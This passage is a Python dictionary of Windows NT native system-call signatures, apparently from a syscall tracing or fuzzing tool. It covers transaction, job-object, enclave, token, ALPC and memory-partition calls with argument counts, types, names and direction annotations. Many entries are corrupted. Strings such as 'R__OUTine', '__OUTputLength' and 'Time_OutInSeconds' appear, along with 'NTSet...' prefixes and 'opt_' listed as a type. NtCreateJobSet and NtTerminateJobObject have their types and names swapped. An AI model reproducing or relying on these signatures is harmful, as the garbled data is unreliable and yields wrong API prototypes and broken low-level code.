[\"TransactionManagerHandle\", \"TransactionManagerInformationClass\", \"TransactionManagerInformation\", \"TransactionManagerInformationLength\", \"PULONG\"], \"NTSTATUS\", [\"__IN\", \"__IN\", None, \"__IN\", None]), \"NtReadOnlyEnlistment\": (2, [\"HANDLE\", \"PLARGE_INTEGER\"], [\"EnlistmentHandle\", \"TmVirtualClock\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\"]), \"NtRecoverEnlistment\": (2, [\"HANDLE\", \"PVOID\"], [\"EnlistmentHandle\", \"EnlistmentKey\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\"]), \"NtRecoverResourceManager\": (1, [\"HANDLE\"], [\"ResourceManagerHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtRecoverTransactionManager\": (1, [\"HANDLE\"], [\"TransactionManagerHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtRegisterProtocolAddressInformation\": (5, [\"HANDLE\", \"PCRM_PROTOCOL_ID\", \"ULONG\", \"PVOID\", \"ULONG\"], [\"ResourceManager\", \"ProtocolId\", \"ProtocolInformationSize\", \"ProtocolInformation\", \"CreateOptions\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\"]), \"NtRenameTransactionManager\": (2, [\"PUNICODE_STRING\", \"LPGUID\"], [\"LogFileName\", \"ExistingTransactionManagerGuid\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtRollBackComplete\": (2, [\"HANDLE\", \"PLARGE_INTEGER\"], [\"EnlistmentHandle\", \"TmVirtualClock\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\"]), \"NtRollBackEnlistment\": (2, [\"HANDLE\", \"PLARGE_INTEGER\"], [\"EnlistmentHandle\", \"TmVirtualClock\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\"]), \"NtRollBackTransaction\": (2, [\"HANDLE\", \"BOOLEAN\"], [\"TransactionHandle\", \"Wait\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtRollforwardTransactionManager\": (2, [\"HANDLE\", \"PLARGE_INTEGER\"], [\"TmHandle\", \"TmVirtualClock\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\"]), \"NTSetInformationEnlistment\": (4, [\"HANDLE\", \"ENLISTMENT__INFORMATION_CLASS\", \"PVOID\", \"ULONG\"], [\"EnlistmentHandle\", \"EnlistmentInformationClass\", \"EnlistmentInformation\", \"EnlistmentInformationLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", None, \"__IN\"]), \"NTSetInformationResourceManager\": (4, [\"HANDLE\", \"RESOURCEMANAGER__INFORMATION_CLASS\", \"PVOID\", \"ULONG\"], [\"ResourceManagerHandle\", \"ResourceManagerInformationClass\", \"ResourceManagerInformation\", \"ResourceManagerInformationLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", None, \"__IN\"]), \"NTSetInformationTransaction\": (4, [\"HANDLE\", \"TRANSACTION__INFORMATION_CLASS\", \"PVOID\", \"ULONG\"], [\"TransactionHandle\", \"TransactionInformationClass\", \"TransactionInformation\", \"TransactionInformationLength\"], \"NTSTATUS\", [\"__IN\", \"__IN\", None, \"__IN\"]), \"NTSetInformationTransactionManager\": (4, [\"HANDLE\", \"TRANSACTIONMANAGER__INFORMATION_CLASS\", \"PVOID\", \"ULONG\"], [\"TmHandle\", \"TransactionManagerInformationClass\", \"TransactionManagerInformation\", \"TransactionManagerInformationLength\"], \"NTSTATUS\", [\"__IN_opt\", \"__IN\", None, \"__IN\"]), \"NTSinglePhaseReject\": (2, [\"HANDLE\", \"PLARGE_INTEGER\"], [\"EnlistmentHandle\", \"TmVirtualClock\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\"]), \"NTStartTm\": (0, [], [], \"NTSTATUS\", []), \"NtThawRegistry\": (0, [], [], \"NTSTATUS\", []), \"NtThawTransactions\": (0, [], [], \"NTSTATUS\", []), \"NtDrawText\": (1, [\"PUNICODE_STRING\"], [\"Text\"], \"NTSTATUS\", [\"__IN\"]), \"NtTraceControl\": (6, [\"ULONG\", \"PVOID\", \"ULONG\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"FunctionCode\", \"InBuffer\", \"InBufferLen\", \"__OUTBuffer\", \"__OUTBufferLen\", \"ReturnLength\"], \"NTSTATUS\", [\"__IN\", None, \"__IN\", None, \"__IN\", \"__OUT\"]), \"NTSetWnfProcessNotificationEvent\": (1, [\"HANDLE\"], [\"Unknown1\"], \"NTSTATUS\", [\"__IN\"]), \"NTSetInformationVirtualMemory\": (6, [\"HANDLE\", \"VIRTUAL_MEMORY__INFORMATION_CLASS\", \"ULONG_PTR\", \"PMEMORY_RANGE_ENTRY\", \"PVOID\", \"ULONG\"], [\"ProcessHandle\", \"VmInformationClass\", \"NumberOfEntries\", \"VirtualAddresses\", \"VmInformation\", \"VmInformationLength\"], \"NTSTATUS\", [\"__IN_\", \"__IN_\", \"__IN_\", None, None, \"__IN_\"]), \"NtOpenPrivateNamespace\": (4, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"PVOID\"], [\"NamespaceHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"BoundaryDescriptor\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\"]), \"NtCreatePrivateNamespace\": (4, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"PVOID\"], [\"NamespaceHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"BoundaryDescriptor\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\"]), \"NtDeletePrivateNamespace\": (1, [\"HANDLE\"], [\"NamespaceHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtReplacePartitionUnit\": (3, [\"PUNICODE_STRING\", \"PUNICODE_STRING\", \"ULONG\"], [\"TargetInstancePath\", \"SpareInstancePath\", \"Flags\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NTSerializeBoot\": (0, [], [], \"NTSTATUS\", []), \"NtOpenKeyTransacted\": (4, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"HANDLE\"], [\"KeyHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"TransactionHandle\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\"]), \"NtOpenKeyTransactedEx\": (5, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"ULONG\", \"HANDLE\"], [\"KeyHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"OpenOptions\", \"TransactionHandle\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NtFreezeRegistry\": (1, [\"ULONG\"], [\"Time_OutInSeconds\"], \"NTSTATUS\", [\"__IN\"]), \"NtCreateKeyTransacted\": (8, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"__reserved\", \"PUNICODE_STRING\", \"ULONG\", \"HANDLE\", \"__opt\"], [\"KeyHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"ULONG\", \"Class\", \"CreateOptions\", \"TransactionHandle\", \"PULONG\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", None, \"__IN_opt\", \"__IN\", \"__IN\", None]), \"NtQuerySecurityAttributesToken\": (6, [\"HANDLE\", \"PUNICODE_STRING\", \"ULONG\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"TokenHandle\", \"Attributes\", \"NumberOfAttributes\", \"Buffer\", \"Length\", \"ReturnLength\"], \"NTSTATUS\", [\"__IN\", None, \"__IN\", None, \"__IN\", \"__OUT\"]), \"NtWow64CallFunction64\": (7, [\"ULONG\", \"ULONG\", \"ULONG\", \"PVOID\", \"ULONG\", \"PVOID\", \"__opt\"], [\"FunctionIndex\", \"Flags\", \"InputLength\", \"InputBuffer\", \"__OUTputLength\", \"__OUTputBuffer\", \"PULONG\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", None, \"__IN\", None, None]), \"NtWow64WriteVirtualMemory64\": (5, [\"HANDLE\", \"PVOID64\", \"PVOID\", \"ULONGLONG\", \"__opt\"], [\"ProcessHandle\", \"BaseAddress\", \"Buffer\", \"BufferSize\", \"PULONGLONG\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\", None, \"__IN\", None]), \"NtAlpcConnectPortEx\": (11, [\"PHANDLE\", \"POBJECT_ATTRIBUTES\", \"POBJECT_ATTRIBUTES\", \"PALPC_PORT_ATTRIBUTES\", \"ULONG\", \"PSECURITY_DESCRIPTOR\", \"PPORT_MESSAGE\", \"PSIZE_T\", \"PALPC_MESSAGE_ATTRIBUTES\", \"PALPC_MESSAGE_ATTRIBUTES\", \"PLARGE_INTEGER\"], [\"PortHandle\", \"ConnectionPortObjectAttributes\", \"ClientPortObjectAttributes\", \"PortAttributes\", \"Flags\", \"ServerSecurityRequirements\", \"ConnectionMessage\", \"BufferLength\", \"__OUTMessageAttributes\", \"InMessageAttributes\", \"Time_Out\"], \"NTSTATUS\", [None, \"__IN_\", \"__IN_opt_\", \"__IN_opt_\", \"__IN_\", \"__IN_opt_\", None, \"__IN_OUT_opt_\", \"__IN_OUT_opt_\", \"__IN_OUT_opt_\", \"__IN_opt_\"]), \"NtAlpcImpersonateClientContainerOfPort\": (3, [\"HANDLE\", \"PPORT_MESSAGE\", \"ULONG\"], [\"PortHandle\", \"Message\", \"Flags\"], \"NTSTATUS\", [\"__IN_\", \"__IN_\", \"__IN_\"]), \"NtAreMappedFilesTheSame\": (2, [\"PVOID\", \"PVOID\"], [\"File1MappedAsAnImage\", \"File2MappedAsFile\"], \"NTSTATUS\", [\"__IN\", \"__IN\"]), \"NtAssignProcessToJobObject\": (2, [\"HANDLE\", \"HANDLE\"], [\"JobHandle\", \"ProcessHandle\"], \"NTSTATUS\", [None, None]), \"NtCreateJobSet\": (3, [\"IN\", \"IN\", \"IN\"], [\"ULONG\", \"PJOB_SET_ARRAY\", \"ULONG\"], \"NTSTATUS\", [None, None, None]), \"NtCreateJobObject\": (3, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"JobHandle\", \"DesiredAccess\", \"ObjectAttributes\"], \"NTSTATUS\", [None, None, None]), \"NtOpenJobObject\": (3, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"JobHandle\", \"DesiredAccess\", \"ObjectAttributes\"], \"NTSTATUS\", [None, None, None]), \"NtQueryInformationJobObject\": (5, [\"HANDLE\", \"JOBOBJECTINFOCLASS\", \"PVOID\", \"ULONG\", \"PULONG\"], [\"JobHandle\", \"JobInformationClass\", \"JobInformation\", \"JobInformationLength\", \"ReturnLength\"], \"NTSTATUS\", [None, None, None, None, None]), \"NTSetInformationJobObject\": (4, [\"HANDLE\", \"JOBOBJECTINFOCLASS\", \"PVOID\", \"ULONG\"], [\"JobHandle\", \"JobInformationClass\", \"JobInformation\", \"JobInformationLength\"], \"NTSTATUS\", [None, None, None, None]), \"NtTerminateJobObject\": (2, [\"HANDLE\", \"NTSYSAPI\"], [\"JobHandle\", \"NTSTATUS\"], \"NTSTATUS\", [None, None]), \"NtCallEnclave\": (4, [\"PENCLAVE_R__OUTINE\", \"PVOID\", \"BOOLEAN\", \"opt_\"], [\"R__OUTine\", \"Parameter\", \"WaitForThread\", \"PVOID\"], \"NTSTATUS\", [\"__IN_\", \"__IN_\", \"__IN_\", None]), \"NtTerminateEnclave\": (2, [\"PVOID\", \"BOOLEAN\"], [\"BaseAddress\", \"WaitForThread\"], \"NTSTATUS\", [\"__IN_\", \"__IN_\"]), \"NtInitializeEnclave\": (5, [\"HANDLE\", \"PVOID\", \"PVOID\", \"ULONG\", \"opt_\"], [\"ProcessHandle\", \"BaseAddress\", \"EnclaveInformation\", \"EnclaveInformationLength\", \"PULONG\"], \"NTSTATUS\", [\"__IN_\", \"__IN_\", None, \"__IN_\", None]), \"NtCreateEnclave\": (9, [\"HANDLE\", \"PVOID*\", \"ULONG_PTR\", \"SIZE_T\", \"SIZE_T\", \"ULONG\", \"PVOID\", \"ULONG\", \"opt_\"], [\"ProcessHandle\", \"BaseAddress\", \"ZeroBits\", \"Size\", \"InitialCommitment\", \"EnclaveType\", \"EnclaveInformation\", \"EnclaveInformationLength\", \"PULONG\"], \"NTSTATUS\", [\"__IN_\", \"__IN_OUT_\", \"__IN_\", \"__IN_\", \"__IN_\", \"__IN_\", None, \"__IN_\", None]), \"NtLoadEnclaveData\": (9, [\"HANDLE\", \"PVOID\", \"PVOID\", \"SIZE_T\", \"ULONG\", \"PVOID\", \"ULONG\", \"opt_\", \"opt_\"], [\"ProcessHandle\", \"BaseAddress\", \"Buffer\", \"BufferSize\", \"Protect\", \"PageInformation\", \"PageInformationLength\", \"PSIZE_T\", \"PULONG\"], \"NTSTATUS\", [\"__IN_\", \"__IN_\", None, \"__IN_\", \"__IN_\", None, \"__IN_\", None, None]), \"NtCreateSectionEx\": (9, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"PLARGE_INTEGER\", \"ULONG\", \"ULONG\", \"HANDLE\", \"PMEM_EXTENDED_PARAMETER\", \"ULONG\"], [\"SectionHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"MaximumSize\", \"SectionPageProtection\", \"AllocationAttributes\", \"FileHandle\", \"ExtendedParameters\", \"ExtendedParameterCount\"], \"NTSTATUS\", [None, \"__IN_\", \"__IN_opt_\", \"__IN_opt_\", \"__IN_\", \"__IN_\", \"__IN_opt_\", None, \"__IN_\"]), \"NtMapViewOfSectionEx\": (9, [\"HANDLE\", \"HANDLE\", \"PVOID\", \"PLARGE_INTEGER\", \"PSIZE_T\", \"ULONG\", \"ULONG\", \"PMEM_EXTENDED_PARAMETER\", \"ULONG\"], [\"SectionHandle\", \"ProcessHandle\", \"*BaseAddress\", \"SectionOffset\", \"ViewSize\", \"AllocationType\", \"Win32Protect\", \"ExtendedParameters\", \"ExtendedParameterCount\"], \"NTSTATUS\", [\"__IN_\", \"__IN_\", None, \"__IN_OUT_opt_\", \"__IN_OUT_\", \"__IN_\", \"__IN_\", None, \"__IN_\"]), \"NtUnmapViewOfSectionEx\": (3, [\"HANDLE\", \"PVOID\", \"ULONG\"], [\"ProcessHandle\", \"BaseAddress\", \"Flags\"], \"NTSTATUS\", [\"__IN_\", \"__IN_opt_\", \"__IN_\"]), \"NtCreatePartition\": (5, [\"HANDLE\", \"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"ULONG\"], [\"ParentPartitionHandle\", \"PartitionHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"PreferredNode\"], \"NTSTATUS\", [\"__IN_\", None, \"__IN_\", \"__IN_opt_\", \"__IN_\"]), \"NtOpenPartition\": (3, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"PartitionHandle\", \"DesiredAccess\", \"ObjectAttributes\"], \"NTSTATUS\", [None, \"__IN_\", \"__IN_\"]), \"NtManagePartition\": (5, [\"HANDLE\", \"HANDLE\", \"PARTITION__INFORMATION_CLASS\", \"PVOID\", \"ULONG\"], [\"TargetHandle\", \"SourceHandle\", \"PartitionInformationClass\", \"PartitionInformation\", \"PartitionInformationLength\"], \"NTSTATUS\", [\"__IN_\", \"__IN_opt_\", \"__IN_\", None, \"__IN_\"]), \"NtMapUserPhysicalPages\": (3, [\"PVOID\", \"ULONG_PTR\", \"PULONG_PTR\"], [\"VirtualAddress\", \"NumberOfPages\", \"UserPfnArray\"], \"NTSTATUS\", [\"__IN_\", \"__IN_\", None]), \"NtAllocateUserPhysicalPagesEx\": (5, [\"HANDLE\", \"PULONG_PTR\", \"PULONG_PTR\", \"PMEM_EXTENDED_PARAMETER\", \"ULONG\"], [\"ProcessHandle\", \"NumberOfPages\", \"UserPfnArray\", \"ExtendedParameters\", \"ExtendedParameterCount\"], \"NTSTATUS\", [\"__IN_\", \"__IN_OUT_\", None, None, \"__IN_\"]), \"NtGetWriteWatch\": (7, [\"HANDLE\", \"ULONG\", \"PVOID\", \"SIZE_T\", \"PVOID\", \"PULONG_PTR\", \"PULONG\"], [\"ProcessHandle\", \"Flags\", \"BaseAddress\", \"RegionSize\", \"*UserAddressArray\", \"EntriesInUserAddressArray\", \"Granularity\"], \"NTSTATUS\", [\"__IN_\", \"__IN_\", \"__IN_\", \"__IN_\", None, \"__IN_OUT_\", None]), \"NtResetWriteWatch\": (3, [\"HANDLE\", \"PVOID\", \"SIZE_T\"], [\"ProcessHandle\", \"BaseAddress\", \"RegionSize\"], \"NTSTATUS\", [\"__IN_\", \"__IN_\", \"__IN_\"]), \"NtCreatePagingFile\": (4, [\"PUNICODE_STRING\", \"PLARGE_INTEGER\", \"PLARGE_INTEGER\", \"ULONG\"], [\"PageFileName\", \"MinimumSize\", \"MaximumSize\", \"Priority\"], \"NTSTATUS\", [\"__IN_\", \"__IN_\", \"__IN_\", \"__IN_\"]), \"NtCancelIoFileEx\": (3, [\"HANDLE\", \"PIO_STATUS_BLOCK\", \"PIO_STATUS_BLOCK\"], [\"FileHandle\", \"IoRequestToCancel\", \"IoStatusBlock\"], \"NTSTATUS\", [\"__IN_\", \"__IN_opt_\", None]), \"NtCancelWaitCompletionPacket\": (2, [\"HANDLE\", \"BOOLEAN\"], [\"WaitCompletionPacketHandle\", \"RemoveSignaledPacket\"], \"NTSTATUS\", [\"__IN_\", \"__IN_\"]), \"NtCreateWaitCompletionPacket\": (3, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\"], [\"WaitCompletionPacketHandle\", \"DesiredAccess\", \"ObjectAttributes\"], \"NTSTATUS\", [None, \"__IN_\", \"__IN_opt_\"]), \"NtCompareObjects\": (2, [\"HANDLE\", \"HANDLE\"], [\"Handle\", \"Handle2\"], \"NTSTATUS\", [\"__IN_\", \"__IN_\"]), \"NtCompareTokens\": (3, [\"HANDLE\", \"HANDLE\", \"PBOOLEAN\"], [\"FirstTokenHandle\", \"SecondTokenHandle\", \"Equal\"], \"NTSTATUS\", [\"__IN_\", \"__IN_\", None]), \"NtContinueEx\": (2, [\"PCONTEXT\", \"PKCONTINUE_ARGUMENT\"], [\"ContextRecord\", \"ContinueArgument\"], \"NTSTATUS\", [\"__IN_\", \"__IN_\"]), \"NtCreateCrossVmEvent\": (6, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"ULONG\", \"PVOID\", \"PGUID\"], [\"EventHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"Unknown\", \"Unknown\", \"Guid\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", None, None, \"__IN\"]), \"NtCreateCrossVmMutant\": (6, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"ULONG\", \"PVOID\", \"PGUID\"], [\"EventHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"Unknown\", \"Unknown\", \"Guid\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", None, None, \"__IN\"]), \"NtCreateDirectoryObjectEx\": (5, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"HANDLE\", \"ULONG\"], [\"DirectoryHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"ShadowDirectoryHandle\", \"Flags\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NtCreateIRTimer\": (2, [\"PHANDLE\", \"ACCESS_MASK\"], [\"TimerHandle\", \"DesiredAccess\"], \"NTSTATUS\", [\"__OUT\", \"__IN\"]), \"NtCreateLowBoxToken\": (9, [\"PHANDLE\", \"HANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"PSID\", \"DWORD\", \"PSID_AND_ATTRIBUTES\", \"DWORD\", \"PVOID\"], [\"LowBoxToken\", \"hOrgToken\", \"DesiredAccess\", \"ObjectAttributes\", \"AppContainerSid\", \"CapabilityCount\", \"Capabilities\", \"LowBoxCount\", \"LowBoxStruct\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NtCreateRegistryTransaction\": (4, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"ULONG\"], [\"RegistryHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"Flags\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\"]), \"NtCreateThreadEx\": (11, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"HANDLE\", \"PVOID\", \"PVOID\", \"ULONG\", \"ULONG\", \"ULONG\", \"ULONG\", \"PVOID\"], [\"ThreadHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"ProcessHandle\", \"StartR__OUTine\", \"Argument\", \"CreateFlags\", \"ZeroBits\", \"StackSize\", \"MaximumStackSize\", \"AttributeList\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\"]), \"NtCreateTimer2\": (5, [\"PHANDLE\", \"PVOID\", \"POBJECT_ATTRIBUTES\", \"ULONG\", \"ACCESS_MASK\"], [\"TimerHandle\", \"Unknown1\", \"ObjectAttributes\", \"Attributes\", \"DesiredAccess\"], \"NTSTATUS\", [\"__OUT\", \"__IN_opt\", \"__IN_opt\", \"__IN\", \"__IN\"]), \"NtCreateTokenEx\": (17, [\"PHANDLE\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"TOKEN_TYPE\", \"PLUID\", \"PLARGE_INTEGER\", \"PTOKEN_USER\", \"PTOKEN_GROUPS\", \"PTOKEN_PRIVILEGES\", \"PTOKEN_SECURITY_ATTRIBUTES__INFORMATION\", \"PTOKEN_SECURITY_ATTRIBUTES__INFORMATION\", \"PTOKEN_GROUPS\", \"PTOKEN_MANDATORY_POLICY\", \"PTOKEN_OWNER\", \"PTOKEN_PRIMARY_GROUP\", \"PTOKEN_DEFAULT_DACL\", \"PTOKEN_SOURCE\"], [\"TokenHandle\", \"DesiredAccess\", \"ObjectAttributes\", \"TokenType\", \"AuthenticationId\", \"ExpirationTime\", \"User\", \"Groups\", \"Privileges\", \"UserAttributes\", \"DeviceAttributes\", \"DeviceGroups\", \"TokenMandatoryPolicy\", \"Owner\", \"PrimaryGroup\", \"DefaultDacl\", \"TokenSource\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN\", \"__IN_opt\", \"__IN\"]), \"NtCreateUserProcess\": (11, [\"PHANDLE\", \"PHANDLE\", \"ACCESS_MASK\", \"ACCESS_MASK\", \"POBJECT_ATTRIBUTES\", \"POBJECT_ATTRIBUTES\", \"ULONG\", \"ULONG\", \"PRTL_USER_PROCESS_PARAMETERS\", \"PVOID\", \"PVOID\"], [\"ProcessHandle\", \"ThreadHandle\", \"ProcessDesiredAccess\", \"ThreadDesiredAccess\", \"ProcessObjectAttributes\", \"ThreadObjectAttributes\", \"ProcessFlags\", \"ThreadFlags\", \"ProcessParameters\", \"CreateInfo\", \"AttributeList\"], \"NTSTATUS\", [\"__OUT\", \"__OUT\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN_OUT\", \"__IN_opt\"]), \"NtCreateWaitablePort\": (5, [\"PHANDLE\", \"POBJECT_ATTRIBUTES\", \"ULONG\", \"ULONG\", \"ULONG\"], [\"PortHandle\", \"ObjectAttributes\", \"MaxConnectionInfoLength\", \"MaxMsgLength\", \"MaxPoolUsage\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NtCreateWnfStateName\": (7, [\"PCWNF_STATE_NAME\", \"ULONG\", \"ULONG\", \"BOOLEAN\", \"PVOID\", \"ULONG\", \"PSECURITY_DESCRIPTOR\"], [\"StateName\", \"Lifetime\", \"DataScope\", \"PersistData\", \"TypeId\", \"MaximumStateSize\", \"SecurityDescriptor\"], \"NTSTATUS\", [\"__OUT\", \"__IN\", \"__IN\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN\"]), \"NtDebugContinue\": (3, [\"HANDLE\", \"PCLIENT_ID\", \"NTSTATUS\"], [\"DebugHandle\", \"ClientId\", \"Status\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\"]), \"NtDeleteBootEntry\": (1, [\"PUNICODE_STRING\"], [\"Name\"], \"NTSTATUS\", [\"__IN\"]), \"NtDeleteDriverEntry\": (1, [\"PUNICODE_STRING\"], [\"Name\"], \"NTSTATUS\", [\"__IN\"]), \"NtDeleteWnfStateData\": (2, [\"PCWNF_STATE_NAME\", \"PVOID\"], [\"StateName\", \"ExplicitScope\"], \"NTSTATUS\", [\"__IN\", \"__IN_opt\"]), \"NtDeleteWnfStateName\": (1, [\"PCWNF_STATE_NAME\"], [\"StateName\"], \"NTSTATUS\", [\"__IN\"]), \"NtDirectGraphicsCall\": (5, [\"ULONG\", \"ULONG\", \"ULONG\", \"ULONG\", \"ULONG\"], [\"Unknown\", \"Unknown\", \"Unknown\", \"Unknown\", \"Unknown\"], \"NTSTATUS\", [None, None, None, None, None]), \"NtFilterBootOption\": (5, [\"ULONG\", \"ULONG\", \"ULONG\", \"PVOID\", \"ULONG\"], [\"FilterOperation\", \"ObjectType\", \"ElementType\", \"Data\", \"DataSize\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NtFilterToken\": (6, [\"HANDLE\", \"ULONG\", \"PTOKEN_GROUPS\", \"PTOKEN_PRIVILEGES\", \"PTOKEN_GROUPS\", \"PHANDLE\"], [\"ExistingTokenHandle\", \"Flags\", \"SidsToDisable\", \"PrivilegesToDelete\", \"RestrictedSids\", \"NewTokenHandle\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\"]), \"NtFilterTokenEx\": (14, [\"HANDLE\", \"ULONG\", \"PTOKEN_GROUPS\", \"PTOKEN_PRIVILEGES\", \"PTOKEN_GROUPS\", \"ULONG\", \"PUNICODE_STRING\", \"ULONG\", \"PUNICODE_STRING\", \"PTOKEN_GROUPS\", \"PTOKEN_SECURITY_ATTRIBUTES__INFORMATION\", \"PTOKEN_SECURITY_ATTRIBUTES__INFORMATION\", \"PTOKEN_GROUPS\", \"PHANDLE\"], [\"TokenHandle\", \"Flags\", \"SidsToDisable\", \"PrivilegesToDelete\", \"RestrictedSids\", \"DisableUserClaimsCount\", \"UserClaimsToDisable\", \"DisableDeviceClaimsCount\", \"DeviceClaimsToDisable\", \"DeviceGroupsToDisable\", \"RestrictedUserAttributes\", \"RestrictedDeviceAttributes\", \"RestrictedDeviceGroups\", \"NewTokenHandle\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN\", \"__IN_opt\", \"__IN\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\"]), \"NtGetCachedSigningLevel\": (6, [\"HANDLE\", \"PULONG\", \"PBYTE\", \"PUCHAR\", \"PULONG\", \"__opt\"], [\"File\", \"Flags\", \"SigningLevel\", \"Thumbprint\", \"ThumbprintSize\", \"PULONG\"], \"NTSTATUS\", [\"__IN\", \"__OUT\", \"__OUT\", \"__OUT\", \"__IN_OUT_opt\", None]), \"NtGetCompleteWnfStateSubscription\": (6, [\"PWNF_STATE_NAME\", \"PULONG\", \"ULONG\", \"ULONG\", \"PVOID\", \"ULONG\"], [\"OldDescriptorStateName\", \"OldSubscriptionId\", \"OldDescriptorEventMask\", \"OldDescriptorStatus\", \"NewDeliveryDescriptor\", \"DescriptorSize\"], \"NTSTATUS\", [\"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__IN_opt\", \"__OUT\", \"__IN\"]), \"NtGetContextThread\": (2, [\"HANDLE\", \"PCONTEXT\"], [\"ThreadHandle\", \"pContext\"], \"NTSTATUS\", [\"__IN\", \"__OUT\"]), \"NtGetCurrentProcessorNumber\": (0, [], [], \"ULONG\", []), \"NtGetCurrentProcessorNumberEx\": (1, [\"__opt\"], [\"PULONG\"], \"NTSTATUS\", [None]), \"NtGetDevicePowerState\": (2, [\"HANDLE\", \"PDEVICE_POWER_STATE\"], [\"DeviceHandle\", \"State\"], \"NTSTATUS\", [\"__IN\", \"__OUT\"]), \"NtImpersonateAnonymousToken\": (1, [\"HANDLE\"], [\"THreadHandle\"], \"NTSTATUS\", [\"__IN\"]), \"NtInitializeRegistry\": (1, [\"ULONG\"], [\"Options\"], \"NTSTATUS\", [\"__IN\"]), \"NtInitiatePowerAction\": (4, [\"POWER_ACTION\", \"SYSTEM_POWER_STATE\", \"ULONG\", \"BOOLEAN\"], [\"Action\", \"State\", \"Flags\", \"Asynch\"], \"NTSTATUS\", [\"__IN\", \"__IN\", \"__IN\", \"__IN\"]), \"NtIsSystemResumeAutomatic\": (0, [], [], \"NTSTATUS\", []), \"NtLoadKeyEx\": (8, [\"POBJECT_ATTRIBUTES\", 